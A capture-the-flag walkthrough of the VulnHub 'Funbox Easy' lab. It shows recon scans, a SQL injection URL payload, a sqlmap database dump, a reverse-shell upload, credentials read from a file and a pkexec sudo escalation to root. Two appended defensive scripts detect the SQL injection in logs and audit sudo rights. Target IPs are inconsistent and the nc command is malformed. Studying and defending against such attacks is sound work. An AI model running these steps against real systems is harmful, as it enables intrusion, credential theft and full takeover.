Machine Link : https://www.vulnhub.com/entry/funbox-easy,526/

STEP1
arp-scan -l

FINDING
192.168.0.105

-------------------------------------------------------------------------------------------------

STEP2
nmap -sSV -A -Pn -p- 192.168.0.105

FINDING
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  mysqlx  MySQL X protocol listener

-------------------------------------------------------------------------------------------------

STEP3
dirb http://192.168.0.105

FINDING
+ http://192.168.0.105/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.0.105/secret/
+ http://192.168.0.105/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.0.105/store/
---- Entering directory: http://192.168.0.105/admin/ ----
==> DIRECTORY: http://192.168.0.105/admin/assets/
---- Entering directory: http://192.168.0.105/store/ ----
+ http://192.168.0.105/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.0.105/store/controllers/
==> DIRECTORY: http://192.168.0.105/store/database/
==> DIRECTORY: http://192.168.0.105/store/functions/
+ http://192.168.0.105/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.0.105/store/models/
==> DIRECTORY: http://192.168.0.105/store/template/

Pages visited:
http://192.168.0.105/store/
http://192.168.0.105/store/admin.php
http://192.168.0.105/secret/ -- shows only a quote: „Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900)
http://192.168.0.105/admin/

-------------------------------------------------------------------------------------------------

STEP4
nikto --host http://192.168.0.105

FINDING
+ /admin/: This might be interesting.
+ /secret/: This might be interesting.
+ /store/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ 8103 requests: 0 error(s) and 12 item(s) reported on remote host

-------------------------------------------------------------------------------------------------

STEP5
dirsearch -u http://192.168.0.105

FINDING
http://192.168.0.105/index.php
http://192.168.0.105/index.php/login/registration.php

-------------------------------------------------------------------------------------------------

STEP6
http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9

CHANGE IT TO
http://192.168.31.119/store/book.php?bookisbn=1%27+or+1=1--

FINDING
Cant retrieve data
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1

-------------------------------------------------------------------------------------------------

STEP7
sqlmap -u "http://192.168.31.119/store/book.php?bookisbn=" --dump-all --batch -D store

FINDING
+--------------------------------------------------+--------+
| pass                                             | name   |
+--------------------------------------------------+--------+
| d033e22ae348aeb5660fc2140aec35850c4da997 (admin) | admin  |
+--------------------------------------------------+--------+

-------------------------------------------------------------------------------------------------

STEP8
http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9
http://192.168.0.105/store/admin.php
admin - admin -- use as user id and password

FINDING
http://192.168.31.119/store/admin_book.php

-------------------------------------------------------------------------------------------------

STEP9
add a new record
upload a payload

-------------------------------------------------------------------------------------------------

STEP10
nc -nvlp 192.168.31.119
on new terminal hit -- http://192.168.31.119/store/
get a reverse shell

-------------------------------------------------------------------------------------------------

STEP11
cd /home
cd tony
ls -la
cat password.txt

FINDING
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: [email protected] admin

-------------------------------------------------------------------------------------------------

STEP12
on new terminal
ssh [email protected]
pwd (password): yxcvbnmYYY
sudo -l

FINDING
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh

-------------------------------------------------------------------------------------------------

STEP13
https://gtfobins.github.io/gtfobins/pkexec/#sudo

FINDING
sudo pkexec /bin/sh
whoami
root
cd /root
ls -la
cat root.flag
(root.flag prints an ASCII-art banner; the extracted text of the banner is not reproducible here)

-------------------------------------------------------------------------------------------------
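From the defender's side, the STEP6/STEP7 requests leave a clear trace in the Apache access log. The following is an added example (not part of the walkthrough) that scans combined-format log lines for the signals those steps produce: a quoted tautology with a comment terminator in a query parameter, and sqlmap's default User-Agent. The log lines, client IP, timestamps and the sqlmap version string are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format lines modelled on the STEP6/STEP7 requests
# (not a capture from the box; IP, timestamps and UA version are made up).
ACCESS_LOG = """\
192.168.31.50 - - [10/Oct/2023:12:00:01 +0000] "GET /store/book.php?bookisbn=978-1-49192-706-9 HTTP/1.1" 200 3998 "-" "Mozilla/5.0"
192.168.31.50 - - [10/Oct/2023:12:00:09 +0000] "GET /store/book.php?bookisbn=1%27+or+1=1-- HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
192.168.31.50 - - [10/Oct/2023:12:01:30 +0000] "GET /store/book.php?bookisbn=978-1-49192-706-9%27 HTTP/1.1" 200 1204 "-" "sqlmap/1.7 (https://sqlmap.org)"
192.168.31.50 - - [10/Oct/2023:12:02:00 +0000] "GET /store/admin.php HTTP/1.1" 200 3153 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A quote followed by OR/AND x=y, as in the STEP6 payload  1' or 1=1--
TAUTOLOGY = re.compile(r"'\s*(?:or|and)\s+[\w']+\s*=\s*[\w']+", re.I)
# Comment terminator used to discard the rest of the original query
COMMENT_TAIL = re.compile(r"(?:--|#|/\*)\s*$")


def sqli_indicators(line: str):
    """Return (ip, target, [indicator, ...]) for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    # parse_qsl decodes %27 and '+' once; unquote catches a double-encoded value
    for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        v = unquote(value)
        if TAUTOLOGY.search(v):
            hits.append(f"{key}: boolean tautology")
        if "'" in v and COMMENT_TAIL.search(v):
            hits.append(f"{key}: quote with comment terminator")
    if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent starts with "sqlmap/"
        hits.append("ua: sqlmap default User-Agent")
    return m["ip"], m["target"], hits


def scan_access_log(log: str):
    """Return only the parsed lines that carry at least one SQL-injection indicator."""
    results = []
    for line in log.splitlines():
        parsed = sqli_indicators(line)
        if parsed and parsed[2]:
            results.append(parsed)
    return results


if __name__ == "__main__":
    for ip, target, hits in scan_access_log(ACCESS_LOG):
        print(ip, target, "->", "; ".join(hits))
```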
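The STEP12 sudo -l output is exactly what a privilege-escalation review should flag before an attacker does. This added example (mine, not from the walkthrough) parses sudo -l style output and reports entries that are risky: binaries GTFOBins documents as spawning a shell under sudo (only pkexec and time are listed here; the set is a deliberate subset to extend from GTFOBins), commands outside the standard bin directories, hidden scripts, and unrestricted ALL. The hostname "funbox" in the sample header is constructed.

```python
import os
import re

# Constructed sample modelled on the STEP12 findings; the header line and
# hostname are made up, the privilege lines are the ones from the walkthrough.
SUDO_L_OUTPUT = """\
User tony may run the following commands on funbox:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""

# "(runas) TAG: TAG: command args" -- tags such as NOPASSWD: or SETENV: are optional
LINE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$")

# Subset of GTFOBins "sudo" entries that give an interactive shell; extend as needed.
SHELL_ESCAPE_BINARIES = {"pkexec", "time"}
STANDARD_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin"}


def audit_sudo_l(output: str) -> dict:
    """Map each risky command to the list of reasons it was flagged."""
    findings = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header or blank line
        nopasswd = "NOPASSWD:" in m["tags"]
        prog = m["cmd"].split()[0]  # first token is the permitted program
        issues = []
        if prog == "ALL":
            issues.append("any command")
        elif os.path.basename(prog) in SHELL_ESCAPE_BINARIES:
            issues.append("shell escape (GTFOBins)")
        if prog != "ALL" and os.path.dirname(prog) not in STANDARD_BIN_DIRS:
            issues.append("outside system bin dirs")
        if os.path.basename(prog).startswith("."):
            issues.append("hidden script")
        if issues and nopasswd:
            issues.append("no password required")
        if issues:
            findings[prog] = issues
    return findings


if __name__ == "__main__":
    for prog, issues in audit_sudo_l(SUDO_L_OUTPUT).items():
        print(f"{prog}: {', '.join(issues)}")
```

Entries such as /usr/bin/yelp are not flagged by these rules, which is the point of keeping the shell-escape set explicit: anything not recognised still needs a manual look rather than an automatic pass.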